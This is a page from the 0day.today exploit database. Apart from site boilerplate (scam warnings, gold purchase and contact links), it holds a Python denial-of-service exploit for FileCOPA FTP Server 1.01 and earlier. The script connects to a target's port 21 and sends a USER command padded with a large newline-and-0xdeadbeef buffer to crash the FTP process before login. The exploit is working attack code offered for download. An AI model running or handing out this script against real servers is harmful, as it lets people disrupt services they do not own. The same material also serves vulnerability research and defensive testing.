0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FileCOPA FTP Server <= 1.01 (USER) Remote Pre-Auth DoS
====================================================== FileCOPA FTP Server <= 1.01 (USER) Remote Pre-Auth DoS ====================================================== ### FILECOPA DOS ### www.filecopa.com ### Found Jan 19 2006, Tested again on the new release 6 April 2006 ### BY Bigeazer ### http://blacksecurity.org ### They are selling this software for $39.95... ### oh well.. maybe they shoud fix it first? # # It appears that FileCopa does not handle alot of new line char # in the USER login. This is in the filecpnt.exe file. # # This is only a DOS, that kills the ftp process import sys,os,string import socket import struct import time print "-------------------------------" print "- FileCopa DOS" print "- Found by: bigeazer" print "- Should have crashed FileCopa" print "-------------------------------" buffer = "\x0a" * 248 + struct.pack('<L',0xdeadbeef) * 960 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: conn = s.connect((sys.argv[1],21)) except: print "- Unable to connect. exiting." sys.exit(1) d = s.recv(1024) time.sleep(1) s.send('USER %s\r\n' % buffer) time.sleep(1) sys.exit(0) # 0day.today [2024-12-27] #